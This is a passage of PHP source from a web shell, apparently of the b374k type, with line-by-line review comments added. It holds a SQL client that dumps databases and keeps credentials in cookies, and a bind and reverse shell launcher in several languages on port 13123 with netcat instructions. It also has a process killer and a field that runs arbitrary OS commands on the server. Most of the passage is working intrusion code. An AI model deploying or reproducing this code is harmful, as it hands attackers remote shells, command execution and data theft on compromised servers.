        // No saved profile in use: take the connection parameters from the request
        // (ssc() is defined outside this chunk).
  2332. $s_sql['host'] = isset($_REQUEST['sqlhost'])? ssc($_REQUEST['sqlhost']) : "";
  2333. $s_sql['port'] = isset($_REQUEST['sqlport'])? ssc($_REQUEST['sqlport']) : "";
  2334. $s_sql['user'] = isset($_REQUEST['sqluser'])? ssc($_REQUEST['sqluser']) : "";
  2335. $s_sql['pass'] = isset($_REQUEST['sqlpass'])? ssc($_REQUEST['sqlpass']) : "";
  2336. $s_sql['type'] = isset($_REQUEST['sqltype'])? ssc($_REQUEST['sqltype']) : "";
  2337. }
  2338.  
  2339. $s_show_form = true;
  2340. $s_show_dbs = true;
  2341.  
  2342. if(isset($_REQUEST['connect'])){
        // sql_connect() and the other sql_* helpers are defined outside this chunk.
        // The 'port' value is not among the arguments passed in this call.
  2343. $s_con = sql_connect($s_sql['type'],$s_sql['host'],$s_sql['user'],$s_sql['pass']);
  2344. $s_sqlcode = isset($_REQUEST['sqlcode']) ? urldecode(ssc($_REQUEST['sqlcode'])) : "";
  2345.  
  2346. if($s_con!==false){
  2347. if(isset($_REQUEST['sqlinit'])){
        // First successful connect from a form: the whole profile, password included,
        // is stored client-side in cookie c[<3 hex chars>] for $s_login_time seconds.
        // The key is a collision-checked label, not a secret.
  2348. $s_sql_cookie = (function_exists(json_encode) && function_exists(json_decode))?json_encode($s_sql):serialize($s_sql);
  2349. $s_c_num = substr(md5(time().rand(0,100)),0,3);
  2350. while(isset($_COOKIE['c']) && is_array($_COOKIE['c']) && array_key_exists($s_c_num, $_COOKIE['c'])){
  2351. $s_c_num = substr(md5(time().rand(0,100)),0,3);
  2352. }
  2353. setcookie("c[".$s_c_num."]", $s_sql_cookie ,time() + $s_login_time);
  2354. }
  2355. $s_show_form = false;
        // Query form: the connection parameters ride along as hidden fields.
        // NOTE(review): those values and the echoed SQL text are written unescaped.
  2356. $s_result .= "<form action='".$s_self."' method='post'>
  2357. <input type='hidden' name='sqlhost' value='".$s_sql['host']."' />
  2358. <input type='hidden' name='sqlport' value='".$s_sql['port']."' />
  2359. <input type='hidden' name='sqluser' value='".$s_sql['user']."' />
  2360. <input type='hidden' name='sqlpass' value='".$s_sql['pass']."' />
  2361. <input type='hidden' name='sqltype' value='".$s_sql['type']."' />
  2362. <input type='hidden' name='x' value='db' />
  2363. <input type='hidden' name='connect' value='connect' />
  2364. <textarea id='sqlcode' name='sqlcode' class='txtarea' style='height:150px;'>".$s_sqlcode."</textarea>
  2365. <p><input type='submit' name='gogo' class='inputzbut' value='Go !' style='width:120px;height:30px;' />
  2366. &nbsp;&nbsp;Separate multiple commands with a semicolon <span class='gaya'>[</span> ; <span class='gaya'>]</span></p>
  2367. </form>";
  2368.  
  2369. if(!empty($s_sqlcode)){
        // The text is split on every ';', including any inside string literals, and
        // each non-blank piece is run as its own statement.
  2370. $s_querys = explode(";",$s_sqlcode);
  2371. foreach($s_querys as $s_query){
  2372. if(trim($s_query) != ""){
  2373. $s_hasil = sql_query($s_sql['type'],$s_query,$s_con);
  2374. if($s_hasil!=false){
        // Column names and cell values pass through hss() (defined elsewhere); the
        // statement text itself is echoed unescaped.
  2375. $s_result .= "<p style='padding:0;margin:6px 10px;font-weight:bold;'>".$s_query.";&nbsp;&nbsp;&nbsp;
  2376. <span class='gaya'>[</span> ok <span class='gaya'>]</span></p>
  2377. <table class='explore sortable' style='width:100%;'><tr>";
  2378. for($s_i=0;$s_i<sql_num_fields($s_sql['type'],$s_hasil);$s_i++)
  2379. $s_result .= "<th>".@hss(sql_field_name($s_sql['type'],$s_hasil,$s_i))."</th>";
  2380. $s_result .= "</tr>";
  2381. while($s_rows=sql_fetch_data($s_sql['type'],$s_hasil)){
  2382. $s_result .= "<tr>";
  2383. foreach($s_rows as $s_r){
  2384. if(empty($s_r)) $s_r = " ";
  2385. $s_result .= "<td>".@hss($s_r)."</td>";
  2386. }
  2387. $s_result .= "</tr>";
  2388. }
  2389. $s_result .= "</table>";
  2390. }
  2391. else{
  2392. $s_result .= "<p style='padding:0;margin:6px 10px;font-weight:bold;'>".$s_query.";&nbsp;&nbsp;&nbsp;
  2393. <span class='gaya'>[</span> error <span class='gaya'>]</span></p>";
  2394. }
  2395. }
  2396. }
  2397. }
  2398. else{
        // No SQL supplied: enumerate databases (skipped for the pdo and odbc types)
        // with a per-engine catalog query, then the tables of each database.
  2399. if(($s_sql['type']!='pdo') && ($s_sql['type']!='odbc')){
  2400. if($s_sql['type']=='mysql') $s_showdb = "SHOW DATABASES";
  2401. elseif($s_sql['type']=='mssql') $s_showdb = "SELECT name FROM master..sysdatabases";
  2402. elseif($s_sql['type']=='pgsql') $s_showdb = "SELECT schema_name FROM information_schema.schemata";
  2403. elseif($s_sql['type']=='oracle') $s_showdb = "SELECT USERNAME FROM SYS.ALL_USERS ORDER BY USERNAME";
  2404. elseif($s_sql['type']=='sqlite3' || $s_sql['type']=='sqlite') $s_showdb = "SELECT \"".$s_sql['host']."\"";
  2405. else $s_showdb = "SHOW DATABASES";
  2406.  
  2407. $s_hasil = sql_query($s_sql['type'],$s_showdb,$s_con);
  2408.  
  2409. if($s_hasil!=false) {
  2410. while($s_rows_arr=sql_fetch_data($s_sql['type'],$s_hasil)){
  2411. foreach($s_rows_arr as $s_rows){
        // NOTE(review): database and table names returned by the server are
        // concatenated into HTML, element ids and follow-up SQL without quoting or
        // escaping.
  2412. $s_result .= "<p class='notif' onclick=\"toggle('db_".$s_rows."')\">".$s_rows."</p>";
  2413. $s_result .= "<div class='info' id='db_".$s_rows."'><table class='explore'>";
  2414.  
  2415. if($s_sql['type']=='mysql') $s_showtbl = "SHOW TABLES FROM ".$s_rows;
  2416. elseif($s_sql['type']=='mssql') $s_showtbl = "SELECT name FROM ".$s_rows."..sysobjects WHERE xtype = 'U'";
  2417. elseif($s_sql['type']=='pgsql') $s_showtbl = "SELECT table_name FROM information_schema.tables WHERE table_schema='".$s_rows."'";
  2418. elseif($s_sql['type']=='oracle') $s_showtbl = "SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='".$s_rows."'";
  2419. elseif($s_sql['type']=='sqlite3' || $s_sql['type']=='sqlite') $s_showtbl = "SELECT name FROM sqlite_master WHERE type='table'";
  2420. else $s_showtbl = "";
  2421.  
  2422. $s_hasil_t = sql_query($s_sql['type'],$s_showtbl,$s_con);
  2423. if($s_hasil_t!=false) {
  2424. while($s_tables_arr=sql_fetch_data($s_sql['type'],$s_hasil_t)){
  2425. foreach($s_tables_arr as $s_tables){
        // Each table gets a link that re-enters this branch with a query for its
        // first 100 rows.
  2426. if($s_sql['type']=='mysql') $s_dump_tbl = "SELECT * FROM ".$s_rows.".".$s_tables." LIMIT 0,100";
  2427. elseif($s_sql['type']=='mssql') $s_dump_tbl = "SELECT TOP 100 * FROM ".$s_rows."..".$s_tables;
  2428. elseif($s_sql['type']=='pgsql') $s_dump_tbl = "SELECT * FROM ".$s_rows.".".$s_tables." LIMIT 100 OFFSET 0";
  2429. elseif($s_sql['type']=='oracle') $s_dump_tbl = "SELECT * FROM ".$s_rows.".".$s_tables." WHERE ROWNUM BETWEEN 0 AND 100;";
  2430. elseif($s_sql['type']=='sqlite' || $s_sql['type']=='sqlite3') $s_dump_tbl = "SELECT * FROM ".$s_tables." LIMIT 0,100";
  2431. else $s_dump_tbl = "";
  2432.  
        // NOTE(review): the link carries the credentials and the SQL text in its
        // query string, neither URL-encoded nor HTML-escaped.
  2433. $s_dump_tbl_link = $s_self."x=db&connect=&sqlhost=".$s_sql['host']."&sqlport=".$s_sql['port']."&sqluser=".$s_sql['user']."&sqlpass=".$s_sql['pass']."&sqltype=".$s_sql['type']."&sqlcode=".$s_dump_tbl;
  2434.  
  2435. $s_result .= "<tr><td ondblclick=\"return go('".addslashes($s_dump_tbl_link)."',event);\"><a href='".$s_dump_tbl_link."' onclick='return false;'>".$s_tables."</a></td></tr>";
  2436. }
  2437. }
  2438. }
  2439. $s_result .= "</table></div>";
  2440. }
  2441. }
  2442. }
  2443. }
  2444. }
  2445. sql_close($s_sql['type'],$s_con);
  2446. }
  2447. else{
  2448. $s_result .= "<p class='notif'>Unable to connect to database</p>";
  2449. $s_show_form = true;
  2450. }
  2451. }
  2452.  
  2453. if($s_show_form){
        // Connection forms: one box per driver that the runtime reports as available.
  2454. // sqltype : mysql, mssql, oracle, pgsql, sqlite, sqlite3, odbc, pdo
  2455. $s_sqllist = array();
  2456. if(function_exists("mysql_connect")) $s_sqllist["mysql"] = "connect to MySQL <span class='desc' style='font-size:12px;'>- using mysql_*</span>";
  2457. if(function_exists("mssql_connect") || function_exists("sqlsrv_connect")) $s_sqllist["mssql"] = "connect to MsSQL <span class='desc' style='font-size:12px;'>- using mssql_* or sqlsrv_*</span>";
  2458. if(function_exists("pg_connect")) $s_sqllist["pgsql"] = "connect to PostgreSQL <span class='desc' style='font-size:12px;'>- using pg_*</span>";
  2459. if(function_exists("oci_connect")) $s_sqllist["oracle"] = "connect to oracle <span class='desc' style='font-size:12px;'>- using oci_*</span>";
  2460. if(function_exists("sqlite_open")) $s_sqllist["sqlite"] = "connect to SQLite <span class='desc' style='font-size:12px;'>- using sqlite_*</span>";
  2461. if(class_exists("SQLite3")) $s_sqllist["sqlite3"] = "connect to SQLite3 <span class='desc' style='font-size:12px;'>- using class SQLite3</span>";
  2462. if(function_exists("odbc_connect")) $s_sqllist["odbc"] = "connect via ODBC <span class='desc' style='font-size:12px;'>- using odbc_*</span>";
  2463. if(class_exists("PDO")) $s_sqllist["pdo"] = "connect via PDO <span class='desc' style='font-size:12px;'>- using class PDO</span>";
  2464.  
        // The loop assigns each key into $s_sql['type'], overwriting the value set
        // above. The <form ... /> tags below are written self-closed.
  2465. foreach($s_sqllist as $s_sql['type']=>$s_sqltitle){
  2466. if($s_sql['type']=="odbc" || $s_sql['type']=="pdo"){
  2467. $s_result .= "<div class='mybox'><h2>".$s_sqltitle."</h2>
  2468. <form action='".$s_self."' method='post' />
  2469. <table class='myboxtbl'>
  2470. <tr><td style='width:170px;'>DSN / Connection String</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
  2471. <tr><td>Username</td><td><input style='width:100%;' class='inputz' type='text' name='sqluser' value='' /></td></tr>
  2472. <tr><td>Password</td><td><input style='width:100%;' class='inputz' type='password' name='sqlpass' value='' /></td></tr>
  2473. </table>
  2474. <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
  2475. <input type='hidden' name='sqltype' value='".$s_sql['type']."' />
  2476. <input type='hidden' name='sqlinit' value='init' />
  2477. <input type='hidden' name='x' value='db' />
  2478. </form>
  2479. </div>";
  2480. }
  2481. elseif($s_sql['type']=="sqlite" || $s_sql['type']=="sqlite3"){
  2482. $s_result .= "<div class='mybox'><h2>".$s_sqltitle."</h2>
  2483. <form action='".$s_self."' method='post' />
  2484. <table class='myboxtbl'>
  2485. <tr><td style='width:170px;'>DB File</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
  2486. </table>
  2487. <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
  2488. <input type='hidden' name='sqltype' value='".$s_sql['type']."' />
  2489. <input type='hidden' name='sqlinit' value='init' />
  2490. <input type='hidden' name='x' value='db' />
  2491. </form>
  2492. </div>";
  2493. }
  2494. else{
  2495. $s_result .= "<div class='mybox'><h2>".$s_sqltitle."</h2>
  2496. <form action='".$s_self."' method='post' />
  2497. <table class='myboxtbl'>
  2498. <tr><td style='width:170px;'>Host</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
  2499. <tr><td>Username</td><td><input style='width:100%;' class='inputz' type='text' name='sqluser' value='' /></td></tr>
  2500. <tr><td>Password</td><td><input style='width:100%;' class='inputz' type='password' name='sqlpass' value='' /></td></tr>
  2501. <tr><td>Port (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='sqlport' value='' /></td></tr>
  2502. </table>
  2503. <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
  2504. <input type='hidden' name='sqltype' value='".$s_sql['type']."' />
  2505. <input type='hidden' name='sqlinit' value='init' />
  2506. <input type='hidden' name='x' value='db' />
  2507. </form>
  2508. </div>";
  2509. }
  2510. }
  2511.  
  2512. }
  2513. } // bind and reverse shell
  2514. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='rs')){
        // Branch for x=rs: renders one form per bind-shell / reverse-shell variant and,
        // when a form is submitted, hands the chosen variant to rs() (defined outside
        // this chunk) together with a payload variable also defined elsewhere.
        // For triage: the request fields used here are x=rs, the variant name itself
        // (bind_* / back_*), rshost_<variant> and rsport_<variant>; the forms pre-fill
        // port 13123. A listening socket or an outbound connection opened by the
        // web-server account is the host-side effect to look for.
        // $s_server_ip and $s_my_ip are not assigned in this branch; the two
        // commented-out lines below show how they may be derived.
  2515. //$s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
  2516. //$s_my_ip = $_SERVER['REMOTE_ADDR'];
        // $s_rshost is assigned here but not read again within this branch.
  2517. $s_rshost = $s_server_ip;
  2518.  
  2519. $s_rsport = "13123";
  2520. // resources $s_rs_pl $s_rs_py $s_rs_rb $s_rs_js $s_rs_c $s_rs_java $s_rs_win
        // Help texts shown beside the forms: 'a' for bind variants, 'b' for reverse.
  2521. $s_rspesana = "Press &#39; Go ! &#39; button and run &#39; nc <i>server_ip</i> <i>port</i> &#39; on your computer";
  2522. $s_rspesanb = "Run &#39; nc -l -v -p <i>port</i> &#39; on your computer and press &#39; Go ! &#39; button";
  2523.  
  2524. //bind_pl bind_py bind_rb bind_c bind_win bind_php back_pl back_py back_rb back_c back_win back_php
  2525.  
  2526. $s_rsbind = array();
  2527. $s_rsback = array();
  2528.  
  2529.  
        // The PHP variants are always offered; the others depend on the capability
        // flags ($s_perl, $s_python, $s_ruby, $s_node, $s_java, $s_win) set outside
        // this chunk.
  2530. $s_rsbind["bind_php"] = "Bind Shell <span class='desc' style='font-size:12px;'>- php</span>";
  2531. $s_rsback["back_php"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- php</span>";
  2532.  
  2533. if($s_perl){
  2534. $s_rsbind["bind_pl"] = "Bind Shell <span class='desc' style='font-size:12px;'>- perl</span>";
  2535. $s_rsback["back_pl"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- perl</span>";
  2536. }
  2537. if($s_python){
  2538. $s_rsbind["bind_py"] = "Bind Shell <span class='desc' style='font-size:12px;'>- python</span>";
  2539. $s_rsback["back_py"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- python</span>";
  2540. }
  2541. if($s_ruby){
  2542. $s_rsbind["bind_rb"] = "Bind Shell <span class='desc' style='font-size:12px;'>- ruby</span>";
  2543. $s_rsback["back_rb"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- ruby</span>";
  2544. }
  2545. if($s_node){
  2546. $s_rsbind["bind_js"] = "Bind Shell <span class='desc' style='font-size:12px;'>- node</span>";
  2547. $s_rsback["back_js"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- node</span>";
  2548. }
  2549. if($s_java){
  2550. $s_rsbind["bind_java"] = "Bind Shell <span class='desc' style='font-size:12px;'>- java</span>";
  2551. $s_rsback["back_java"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- java</span>";
  2552. }
  2553. if($s_win){
  2554. $s_rsbind["bind_win"] = "Bind Shell <span class='desc' style='font-size:12px;'>- windows executable</span>";
  2555. $s_rsback["back_win"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- windows executable</span>";
  2556. }
  2557. else{
  2558. $s_rsbind["bind_c"] = "Bind Shell <span class='desc' style='font-size:12px;'>- c</span>";
  2559. $s_rsback["back_c"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- c</span>";
  2560. }
  2561.  
  2562. $s_rslist = array_merge($s_rsbind,$s_rsback);
  2563.  
        // Presumably rs() needs to write into the current directory - confirm against
        // its definition; here only a warning is shown when $s_cwd is not writable.
  2564. if(!is_writable($s_cwd)) $s_result .= "<p class='notif'>Directory ".$s_cwd." is not writable, please change to a writable one</p>";
  2565. $s_rs_err = "";
  2566. foreach($s_rslist as $s_rstype=>$s_rstitle){
        // The key is "<mode>_<language>"; the mode selects help text, default address
        // and whether the address input is disabled.
  2567. $s_split = explode("_",$s_rstype);
  2568. if($s_split[0]=="bind"){
  2569. $s_rspesan = $s_rspesana;
  2570. $s_rsdisabled = "disabled='disabled'";
  2571. $s_rstarget = $s_server_ip;
  2572. $s_labelip = "Server IP";
  2573. }
  2574. elseif($s_split[0]=="back"){
  2575. $s_rspesan = $s_rspesanb;
  2576. $s_rsdisabled = "";
  2577. $s_rstarget = $s_my_ip;
  2578. $s_labelip = "Target IP";
  2579. }
  2580. if(isset($_REQUEST[$s_rstype])){
        // NOTE(review): $s_rshost_ / $s_rsport_ stay unset when the matching field is
        // absent; the address input is rendered disabled for bind variants, and
        // browsers do not submit disabled inputs.
  2581. if(isset($_REQUEST["rshost_".$s_rstype])) $s_rshost_ = ss($_REQUEST["rshost_".$s_rstype]);
  2582. if(isset($_REQUEST["rsport_".$s_rstype])) $s_rsport_ = ss($_REQUEST["rsport_".$s_rstype]);
  2583.  
        // Bind variants receive only the port; reverse variants receive "port host".
  2584. if($s_split[0]=="bind") $s_rstarget_packed = $s_rsport_;
  2585. elseif($s_split[0]=="back") $s_rstarget_packed = $s_rsport_." ".$s_rshost_;
  2586.  
        // The language suffix selects the payload variable. The last line ends with a
        // doubled semicolon, which is a harmless empty statement.
  2587. if($s_split[1]=="pl") $s_rscode = $s_rs_pl;
  2588. elseif($s_split[1]=="py") $s_rscode = $s_rs_py;
  2589. elseif($s_split[1]=="rb") $s_rscode = $s_rs_rb;
  2590. elseif($s_split[1]=="js") $s_rscode = $s_rs_js;
  2591. elseif($s_split[1]=="c") $s_rscode = $s_rs_c;
  2592. elseif($s_split[1]=="java") $s_rscode = $s_rs_java;
  2593. elseif($s_split[1]=="win") $s_rscode = $s_rs_win;
  2594. elseif($s_split[1]=="php") $s_rscode = $s_rs_php;;
        // A non-empty return value from rs() is treated as an error message and
        // escaped through hss() before display.
  2595. $s_buff = rs($s_rstype,$s_rstarget_packed,$s_rscode);
  2596. if($s_buff!="") $s_rs_err = "<p class='notif'>".hss($s_buff)."</p>";
  2597. }
  2598. $s_result .= "<div class='mybox'><h2>".$s_rstitle."</h2>
  2599. <form action='".$s_self."' method='post' />
  2600. <table class='myboxtbl'>
  2601. <tr><td style='width:100px;'>".$s_labelip."</td><td><input ".$s_rsdisabled." style='width:100%;' class='inputz' type='text' name='rshost_".$s_rstype."' value='".$s_rstarget."' /></td></tr>
  2602. <tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='rsport_".$s_rstype."' value='".$s_rsport."' /></td></tr>
  2603. </table>
  2604. <input type='submit' name='".$s_rstype."' class='inputzbut' value='Go !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
  2605. &nbsp;&nbsp;<span>".$s_rspesan."</span>
  2606. <input type='hidden' name='x' value='rs' />
  2607. </form>
  2608. </div>";
  2609. }
        // Any error from the last submitted variant is shown above the forms.
  2610. $s_result = $s_rs_err.$s_result;
  2611. } // task manager
  2612. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='ps')){
  2613. $s_buff = "";
  2614. // kill process specified by pid
  2615. if(isset($_REQUEST['pid'])){
  2616. $s_p = trim(ss($_REQUEST['pid']),"|");
  2617. $s_parr = explode("|", $s_p);
  2618.  
  2619. foreach($s_parr as $s_p){
  2620. if(function_exists("posix_kill")) $s_buff .= (posix_kill($s_p,'9'))? "<p class='notif'>Process with pid ".$s_p." has been successfully killed</p>":"<p class='notif'>Unable to kill process with pid ".$s_p."</p>";
  2621. else{
  2622. if(!$s_win) $s_buff .= "<p class='notif'>".exe("kill -9 ".$s_p)."</p>";
  2623. else $s_buff .= "<p class='notif'>".exe("taskkill /F /PID ".$s_p)."</p>";
  2624. }
  2625. }
  2626. }
  2627.  
  2628. if(!$s_win) $s_h = "ps aux";
  2629. else $s_h = "tasklist /V /FO csv";
  2630. $s_wcount = 11;
  2631. $s_wexplode = " ";
  2632. if($s_win) $s_wexplode = "\",\"";
  2633.  
  2634. $s_res = exe($s_h);
  2635. if(trim($s_res)=='') $s_result = "<p class='notif'>Error getting process list</p>";
  2636. else{
  2637. if($s_buff!="") $s_result = $s_buff;
  2638. $s_result .= "<table class='explore sortable'>";
  2639. if(!$s_win) $s_res = preg_replace('#\ +#',' ',$s_res);
  2640.  
  2641. $s_psarr = explode("\n",$s_res);
  2642. $s_fi = true;
  2643. $s_tblcount = 0;
  2644.  
  2645. $s_check = explode($s_wexplode,$s_psarr[0]);
  2646. $s_wcount = count($s_check);
  2647.  
  2648. foreach($s_psarr as $s_psa){
  2649. if(trim($s_psa)!=''){
  2650. if($s_fi){
  2651. $s_fi = false;
  2652. $s_psln = explode($s_wexplode,$s_psa,$s_wcount);
  2653. $s_result .= "<tr><th style='width:24px;' class='sorttable_nosort'></th><th class='sorttable_nosort'>action</th>";
  2654. foreach($s_psln as $s_p) $s_result .= "<th>".trim(trim(strtolower($s_p)),"\"")."</th>";
  2655. $s_result .= "</tr>";
  2656. }
  2657. else{
  2658. $s_psln = explode($s_wexplode,$s_psa,$s_wcount);
  2659. $s_result .= "<tr>";
  2660. $s_tblcount = 0;
  2661. foreach($s_psln as $s_p){
  2662. $s_pid = trim(trim($s_psln[1]),"\"");
  2663. if(trim($s_p)=="") $s_p = "&nbsp;";
  2664. if($s_tblcount == 0){
  2665. $s_result .= "<td style='text-align:center;text-indent:4px;'><input id='".md5($s_pid)."' name='cbox' value='".$s_pid."' type='checkbox' class='css-checkbox' onchange='hilite(this);' /><label for='".md5($s_pid)."' class='css-label'></label></td><td style='text-align:center;'><a href='".$s_self."x=ps&pid=".$s_pid."' onclick='return false;'>kill</a></td>
  2666. <td style='text-align:center;'>".trim(trim($s_p),"\"")."</td>";
  2667. $s_tblcount++;
  2668. }
  2669. else{
  2670. $s_tblcount++;
  2671. if($s_tblcount == count($s_psln)) $s_result .= "<td style='text-align:left;'>".trim(trim($s_p),"\"")."</td>";
  2672. else $s_result .= "<td style='text-align:center;'>".trim(trim($s_p),"\"")."</td>";
  2673. }
  2674. }
  2675. $s_result .= "</tr>";
  2676. }
  2677. }
  2678. }
  2679. $colspan = count($s_psln)+1;
  2680. $s_result .= "<tfoot><tr class='cbox_selected'><td class='cbox_all'>
  2681. <form action='".$s_self."' method='post'>
  2682. <input id='checkalll' type='checkbox' name='abox' class='css-checkbox' onclick='checkall();' />
  2683. <label for='checkalll' class='css-label'></label>
  2684. </form>
  2685. </td><td style='text-indent:10px;padding:2px;' colspan=".$colspan."><a href='javascript: pkill();' onclick='return false;'>kill selected</a></td>
  2686. </tr></tfoot></table>";
  2687. }
  2688. }
  2689. else{
  2690. if(isset($_REQUEST['cmd'])){
  2691. $s_cmd = ss($_REQUEST['cmd']);
  2692. if(strlen($s_cmd) > 0){
  2693. if(preg_match('#^cd(\ )+(.*)#',$s_cmd,$s_r)){
  2694. $s_nd = trim($s_r[2]);
  2695. if(is_dir($s_nd)){
  2696. chdir($s_nd);
  2697. $s_cwd = cp(getcwd());
  2698. setcookie("cwd", $s_cwd ,time() + $s_login_time);
  2699. $s_result .= showdir($s_cwd);
  2700. }
  2701. elseif(is_dir($s_cwd.$s_nd)){
  2702. chdir($s_cwd.$s_nd);
  2703. $s_cwd = cp(getcwd());
  2704. setcookie("cwd", $s_cwd ,time() + $s_login_time);
  2705. $s_result .= showdir($s_cwd);
  2706. }
  2707. else $s_result .= "<p class='notif'>".$s_nd." is not a directory"."</p>";
  2708. }
  2709. else{
  2710. $s_r = hss(exe($s_cmd));
  2711. if($s_r != '') $s_result .= "<pre>".$s_r."</pre>";
  2712. else $s_result .= showdir($s_cwd);
  2713. }
  2714. }
  2715. else $s_result .= showdir($s_cwd);
  2716. }
  2717. else{
  2718. $s_result .= showdir($s_cwd);
  2719. }
  2720. }
  2721.  
  2722. // find drive letters
  2723. $s_letters = '';
  2724. $s_v = explode("\\",$s_cwd);
  2725. $s_v = $s_v[0];
  2726. foreach (range("A","Z") as $s_letter){
  2727. if(is_dir($s_letter.":\\") && is_readable($s_letter.":\\")){
  2728. $s_letters .= "<a href='".$s_self."cd=".$s_letter.":\\' onclick='return false;'>[ ";
  2729. if ($s_letter.":" != $s_v) {$s_letters .= $s_letter;}
  2730. else {$s_letters .= "<span class='drive-letter'>".$s_letter."</span>";}
  2731. $s_letters .= " ]</a> ";
  2732. }
  2733. }
  2734.  
  2735. // print useful info
  2736. $s_info = "<table class='headtbl'><tr><td>".$s_system."</td></tr>";
  2737. $s_info .= "<tr><td>".$s_software."</td></tr>";
  2738. $s_info .= "<tr><td>server ip : ".$s_server_ip."<span class='gaya'> | </span>your ip : ".$s_my_ip;
  2739. $s_info .= "<span class='gaya'> | </span> Time @ Server : ".@date("d M Y H:i:s",time());
  2740. $s_info .= "
  2741. </td></tr>
  2742. <tr><td style='text-align:left;'>
  2743. <table class='headtbls'><tr>
  2744. <td>".trim($s_letters)."</td>
  2745. <td>
  2746. <span id='chpwd'>
  2747. &nbsp;<a href=\"javascript:tukar('chpwd','chpwdform')\">
  2748. <img height='16px' width='16px' src='".$s_favicon."' alt='Change' style='vertical-align:middle;margin:6px 0;border:0;' />
  2749. &nbsp;&nbsp;</a>".swd($s_cwd)."</span>
  2750. <form action='".$s_self."' method='post' style='margin:0;padding:0;'>
  2751. <span class='sembunyi' id='chpwdform'>
  2752. &nbsp;<a href=\"javascript:tukar('chpwdform','chpwd');\">
  2753. <img height='16px' width='16px' src='".$s_favicon."' alt='Change' style='vertical-align:middle;margin:6px 0;border:0;' />
  2754. </a>&nbsp;&nbsp;
  2755. <input type='text' name='view' class='inputz' style='width:300px;' value='".$s_cwd."' />
  2756. <input class='inputzbut' type='submit' name='submit' value='view file / folder' />
  2757. </span>
  2758. </form>
  2759. </td></tr>
  2760. </table>
  2761. </td></tr>
  2762. </table>";
  2763.  
  2764.  
  2765. }
  2766.  
  // Take whatever was written into the output buffer while the request was
  // handled (the file opens with @ob_start() and turns error display off),
  // show it as a notification above the result, then discard the buffer so
  // only the HTML template that follows reaches the client.
  2767. $s_error = ob_get_contents();
  2768. if(!empty($s_error)) $s_result = "<p class='notif'>".$s_error."</p>".$s_result;
  2769. ob_end_clean();
  2770.  
  2771. ?>
  2772. <!DOCTYPE html>
  2773. <html>
  2774. <head>
  2775. <title><?php echo $s_title; ?></title>
  2776. <meta charset="utf-8">
  2777. <meta name='robots' content='noindex, nofollow, noarchive'>
  2778. <link rel='SHORTCUT ICON' href='<?php echo $s_favicon; ?>'>
  2779. <link href='http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700' rel='stylesheet' type='text/css'>
  2780. <style type='text/css'>
  2781. *{font-family:Ubuntu Mono,serif;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}
  2782. body{background:<?php echo $s_color[0];?>;font-size:12px;color:<?php echo $s_color[1];?>;font-weight:400;}
  2783. hr{border:1px solid <?php echo $s_color[2];?>;}
  2784. a{color:<?php echo $s_color[3];?>;text-decoration:none;}
  2785. a:hover{color:<?php echo $s_color[1];?>;}
  2786. pre{padding:0 8px;}
  2787. form{display:inline;}
  2788. table th,p{cursor:default;}
  2789. #main{background:<?php echo $s_color[4];?>;-moz-border-radius:10px;border-radius:10px;width:100%;padding:2px 8px;}
  2790. #header{text-align:left;margin:0;padding:0;}
  2791. #header td{margin:0;padding:0;}
  2792. #header h1{font-size:20px;-webkit-transform:rotate(-13.37deg);-moz-transform:rotate(-13.37deg);margin:0;padding:0;}
  2793. #header h1 a,.explorelist:hover a{color:<?php echo $s_color[1];?>;}
  2794. #menu{background:<?php echo $s_color[4];?>;margin:0 2px 4px;}
  2795. #result{-moz-border-radius:10px;border-radius:10px;border:1px solid <?php echo $s_color[3];?>;line-height:16px;background:<?php echo $s_color[4];?>;color:<?php echo $s_color[5];?>;margin:0 0 8px;padding:4px 8px;}
  2796. .headinfo{border-left:1px solid <?php echo $s_color[3];?>;margin:6px;padding:2px 0 0 16px;}
  2797. .headtbls tr{height:24px;vertical-align:middle;}
  2798. .gaya,.ver{color:<?php echo $s_color[3];?>;font-weight:700;}
  2799. .ver{-webkit-transform:rotate(-13.37deg);-moz-transform:rotate(-13.37deg);letter-spacing:2px;}
  2800. .menumi{background:<?php echo $s_color[6];?>;color:<?php echo $s_color[3];?>;text-decoration:none;letter-spacing:2px;font-size:12px;-webkit-transform:rotate(-13.37deg);-moz-transform:rotate(-13.37deg);-moz-border-radius:4px;border-radius:4px;margin:0;padding:4px 8px;}
  2801. .menumi:hover{background:<?php echo $s_color[7];?>;-webkit-transform:rotate(13.37deg);-moz-transform:rotate(13.37deg);}
  2802. .inputz,.prompt,.txtarea{background:<?php echo $s_color[4];?>;border:0;border-bottom:1px solid <?php echo $s_color[7];?>;font-size:12px;color:<?php echo $s_color[1];?>;padding:2px;}
  2803. .prompt{font-weight:700;}
  2804. .txtarea{width:100%;height:370px;}
  2805. .inputzbut{font-size:12px;background:<?php echo $s_color[8];?>;color:<?php echo $s_color[3];?>;border:1px solid <?php echo $s_color[2];?>;margin:0 4px;}
  2806. .explore{width:100%;padding:4px 0;}
  2807. .explore a{text-decoration:none;}
  2808. .explore td{border-bottom:1px solid <?php echo $s_color[2];?>;line-height:24px;vertical-align:top;padding:0 8px;}
  2809. .explore th{font-weight:700;background:<?php echo $s_color[2];?>;padding:6px 8px;}
